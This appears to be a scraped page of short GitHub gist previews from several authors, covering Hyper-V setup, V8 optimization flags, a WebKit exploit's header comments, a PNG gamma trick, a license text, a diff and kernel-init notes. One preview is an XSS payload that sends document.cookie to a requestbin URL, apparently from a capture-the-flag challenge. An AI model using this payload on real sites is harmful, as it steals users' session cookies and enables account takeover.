milnak

Setup Hyper-V enhanced session for Ubuntu 20

I couldn't find instructions that were 100% complete, so I put this together.

These instructions worked fine for me. Follow each step carefully.

Download Ubuntu 20 desktop

DO NOT create the VM by choosing Quick Create in Hyper-V Manager. Follow these instructions exactly.

naugtur

%GetOptimizationStatus return a set of bitwise flags instead of a single value, to access the value, you need to take the binary representation of the returned value. Now, for example, if 65 is returned, the binary representation is the following:

(65).toString(2).padStart(12, '0');
// 000001000001

Each binary digit acts as a boolean with the following meaning:

stek29

// a bit more annotated stage2 (from fakeobj/addrof to rw)
// source: https://github.com/phoenhex/files/blob/master/exploits/ios-11.3.1/pwn_i8.js

// useful resources:
// webkit sources, lol
// http://phrack.org/papers/attacking_javascript_engines.html -- bit outdated -- info about spectre mitigations/gigacage is missing
// https://labs.mwrinfosecurity.com/blog/some-brief-notes-on-webkit-heap-hardening/ -- tldr on gigacage

// thx _niklasb

tyage

<script>location.href="//requestbin.fullcontact.com/15g8ko51?"+document.cookie</script>
<iframe src=/profile.php?id=c7ab51c5bdeec6bc6068d8a643a29907a1b7c71acb455454381fe7320cd5283e id=msg csp="script-src 'unsafe-inline';">

romanking98

GoGoGadget (1 solve)

Tool credits : @scwuaptx, pwngdb for making public awesome malloc research

Layout

*------------------------------*
 Hi Inspector!

damonjw

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

marcan

#!/bin/sh
# PNG Gamma trick (by @marcan42 / [email protected])
#
# This script implements an improved version of the gamma trick used to make
# thumbnail images on reddit/4chan look different from the full-size image.
#
# Sample output (SFW; images by @Miluda):
#  https://mrcn.st/t/homura_gamma_trick.png
#  https://www.reddit.com/r/test/comments/6edthw/ (click for fullsize)
#  https://twitter.com/marcan42/status/869855956842143744

Lense

diff --git a/x.c b/x.c
index 5828a3b..ace044f 100644
--- a/x.c
+++ b/x.c
@@ -116,8 +116,6 @@ typedef struct {
 	int width;
 	int ascent;
 	int descent;
-	int badslant;
-	int badweight;

marcan

#!/boot/bzImage

# Linux kernel userspace initialization code, translated to bash
# (Minus floppy disk handling, because seriously, it's 2017.)
# Not 100% accurate, but gives you a good idea of how kernel init works
# GPLv2, Copyright 2017 Hector Martin <[email protected]>
# Based on Linux 4.10-rc2.

# Note: pretend chroot is a builtin and affects the current process
# Note: kernel actually uses major/minor device numbers instead of device name

yrp604

XNU syscall path

Chart

             +------------------+
             |These push their  |                                  +-----------------------+
             |respective syscall|                                  |This overwrites the    |
             |dispatch functions|                                  |saved dispatch function|
             |onto the stack    |                                  |with hndl_alltraps     |